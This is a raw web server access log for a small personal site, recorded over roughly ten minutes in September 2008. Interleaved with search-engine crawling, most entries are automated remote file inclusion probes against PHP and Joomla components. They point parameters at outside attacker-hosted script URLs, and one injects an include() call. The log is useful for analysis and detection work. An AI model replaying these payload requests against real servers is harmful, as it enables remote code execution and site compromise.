58.177.86.197 - - [22/Sep/2008:10:58:34 -0700] "GET /logs/access_080830.log//administrator/index.php?option=com_remository&mosConfig_absolute_path=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:58:37 -0700] "GET /bikes/dteel/2008_09_21/ HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:58:46 -0700] "GET /bikes/dteel/EQ2/ HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:58:47 -0700] "GET /bikes/dteel/?M=A HTTP/1.0" 200 3712 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:58:58 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:58:58 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:10:58:58 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.77 - - [22/Sep/2008:10:59:09 -0700] "GET /logs/access_080725.log/errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:59:21 -0700] "GET /bikes/dteel/2008_09_19/ HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:59:30 -0700] "GET /bikes/dteel/2008_09_21/?N=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:59:32 -0700] "GET //guestbook?include_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:59:32 -0700] "GET /logs/access_080525.log//guestbook?include_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:59:32 -0700] "GET /logs//guestbook?include_path=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:59:34 -0700] "GET /bikes/dteel/2008_02_08/ HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:59:35 -0700] "GET /bikes/dteel/2008_09_14/ HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:59:42 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:59:42 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:10:59:42 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
195.5.163.212 - - [22/Sep/2008:10:59:46 -0700] "GET /logs/access_080825.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:59:55 -0700] "GET /bikes/dteel/2008_07_03/ HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:59:55 -0700] "GET /logs/access_080831.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.32 - - [22/Sep/2008:10:59:55 -0700] "GET /logs/access_080824.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://zvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.30.101.70 - - [22/Sep/2008:10:59:56 -0700] "GET /logs/access_071119.log HTTP/1.0" 200 21994 "http://www.google.ro/search?q=400+price&hl=ro&lr=&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; FunWebProducts-MyWay)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:10:59:59 -0700] "GET /bikes/dteel/2008_08_17/ HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [22/Sep/2008:11:00:02 -0700] "GET /blog/index.php/page/2/?show=gallery&pageid=172 HTTP/1.0" 200 9264 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
216.104.33.186 - - [22/Sep/2008:11:00:20 -0700] "GET /logs/access_080820.log//modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:11:00:20 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:11:00:22 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
122.201.81.53 - - [22/Sep/2008:11:00:23 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.fotohead.nl/admin/bo.do? HTTP/1.1" 200 95026 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
80.251.174.138 - - [22/Sep/2008:11:00:26 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://vobucks.com/bo.do?? HTTP/1.1" 200 94972 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:28 -0700] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.0" 200 7100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:34 -0700] "GET /bikes/dteel/2008_09_05/?D=A HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:35 -0700] "GET /bikes/dteel/2008_09_14/?M=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:38 -0700] "GET /bikes/dteel/2008_09_19/?N=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:53 -0700] "GET /bikes/dteel/2008_09_21/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:56 -0700] "GET /bikes/dteel/2008_09_21/?M=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:00:57 -0700] "GET /bikes/dteel/2008_09_05/?N=D HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:11:01:17 -0700] "GET /logs/access_080415.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:01:18 -0700] "GET /bikes/dteel/2008_09_19/?M=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:01:19 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:11:01:22 -0700] "GET /logs/access_080214.log//?path%5Bdocroot%5D=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:11:01:23 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 200 66168 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:11:01:23 -0700] "GET /logs/access_080504.log//?path%5Bdocroot%5D=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.246.23.84 - - [22/Sep/2008:11:01:24 -0700] "GET //?path%5Bdocroot%5D=http://www.clubrexton.net/zboard//mraneti.txt??%0D?? HTTP/1.1" 200 94886 "-" "libwww-perl/5.814" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:01:36 -0700] "GET /bikes/dteel/2008_08_17/?S=A HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:11:02:40 -0700] "GET /logs/access_080905.log//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.37.2 - - [22/Sep/2008:11:02:40 -0700] "GET /logs/access_080807.log//include/write.php?dir=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:02:42 -0700] "GET /bikes/dteel/2008_09_01/ HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:02:45 -0700] "GET /bikes/dteel/?D=A HTTP/1.0" 200 3712 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:02:54 -0700] "GET /bikes/dteel/2008_09_19/?S=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:11:02:56 -0700] "GET /logs/access_080831.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:03:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/?D=A HTTP/1.0" 200 4809 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:03:05 -0700] "GET /logs/access_080418.log//citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:03:10 -0700] "GET //citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:03:12 -0700] "GET /logs//citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:11:03:13 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:03:18 -0700] "GET /bikes/dteel/2008_09_19/?M=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:03:18 -0700] "GET /bikes/dteel/2008_09_19/?D=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.220.215.63 - - [22/Sep/2008:11:03:24 -0700] "GET /logs/access_080901.log//components/com_flyspray/startdown.php?file=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:11:03:27 -0700] "GET /logs/access_080825.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:03:29 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:03:29 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.229.208.165 - - [22/Sep/2008:11:03:30 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=link%20uploadan%20on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.40.42 - - [22/Sep/2008:11:03:33 -0700] "GET /logs/access_080530.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.trade-an-item.com/docs/sql/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.158 - - [22/Sep/2008:11:03:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.158 - - [22/Sep/2008:11:03:38 -0700] "GET /logs/access_080401.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:11:03:51 -0700] "GET /logs/access_080803.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.192.194 - - [22/Sep/2008:11:03:51 -0700] "GET /logs/access_080901.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:03:53 -0700] "GET /logs/access_080512.log//citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:04:00 -0700] "GET /bikes/dteel/2008_09_21/?N=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:11:04:12 -0700] "GET /logs/access_080830.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:11:04:13 -0700] "GET /logs/access_080903.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.119 - - [22/Sep/2008:11:04:18 -0700] "GET /logs/access_080902.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.110.119 - - [22/Sep/2008:11:04:18 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.100.82 - - [22/Sep/2008:11:04:19 -0700] "GET /logs/index.php?Language=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.110.119 - - [22/Sep/2008:11:04:19 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.100.82 - - [22/Sep/2008:11:04:19 -0700] "GET /logs/access_080510.log/index.php?Language=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.82 - - [22/Sep/2008:11:04:20 -0700] "GET /index.php?Language=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 200 94762 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.82 - - [22/Sep/2008:11:04:23 -0700] "GET /logs/access_080503.log/index.php?Language=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:04:43 -0700] "GET /bikes/dteel/2008_09_01/?N=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.44.72.170 - - [22/Sep/2008:11:05:18 -0700] "GET /logs/access_080825.log/include/bbs.lib.inc.php?site_path=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:11:06:12 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
190.54.62.91 - - [22/Sep/2008:11:06:12 -0700] "GET /logs/access_080705.log//config/dbutil.bck.php?confdir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.91 - - [22/Sep/2008:11:06:12 -0700] "GET //config/dbutil.bck.php?confdir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:11:06:13 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
190.54.62.91 - - [22/Sep/2008:11:06:13 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.104.33.186 - - [22/Sep/2008:11:06:24 -0700] "GET /logs/access_080902.log//modules/xfsection/modify.php?dir_module=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:11:06:33 -0700] "GET /logs/access_080803.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.93.234 - - [22/Sep/2008:11:06:33 -0700] "GET /logs/access_080901.log//components/com_performs/performs.php?mosConfig_absolute_path=%68%74%74%70%3a%2f%2fzvze.centelia.org/img/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.54.62.91 - - [22/Sep/2008:11:06:49 -0700] "GET /logs/access_080421.log//config/dbutil.bck.php?confdir=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:11:06:50 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [22/Sep/2008:11:06:51 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:07:09 -0700] "GET /logs/access_080905.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:07:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:07:10 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.87.145 - - [22/Sep/2008:11:07:12 -0700] "GET //citywriter/head.php?path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.115.110.119 - - [22/Sep/2008:11:07:13 -0700] "GET /logs/access_080702.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.4.26.248 - - [22/Sep/2008:11:07:31 -0700] "GET /bikes/dteel/2008_09_21/Rides413s.jpg HTTP/1.1" 200 313821 "http://www.st-owners.com/forums/showthread.php?t=42795&page=22" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:11:07:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [22/Sep/2008:11:07:46 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:11:08:30 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [22/Sep/2008:11:08:30 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.geocities.com/nove.li/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.246.7.59 - - [22/Sep/2008:11:08:56 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:16 -0700] "GET /logs/access_080401.log//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:16 -0700] "GET //shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:16 -0700] "GET /logs//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:20 -0700] "GET /logs/access_080401.log//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:20 -0700] "GET //shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:20 -0700] "GET /logs//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:39 -0700] "GET /logs/access_080401.log//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:40 -0700] "GET //shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:40 -0700] "GET /logs//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.6.18.225 - - [22/Sep/2008:11:09:42 -0700] "GET /bikes/dteel/2008_09_01/?M=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.198.145 - - [22/Sep/2008:11:09:48 -0700] "GET /logs/access_080402.log//shop.php?prod=http://jofchurch.org/calendar/includes/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
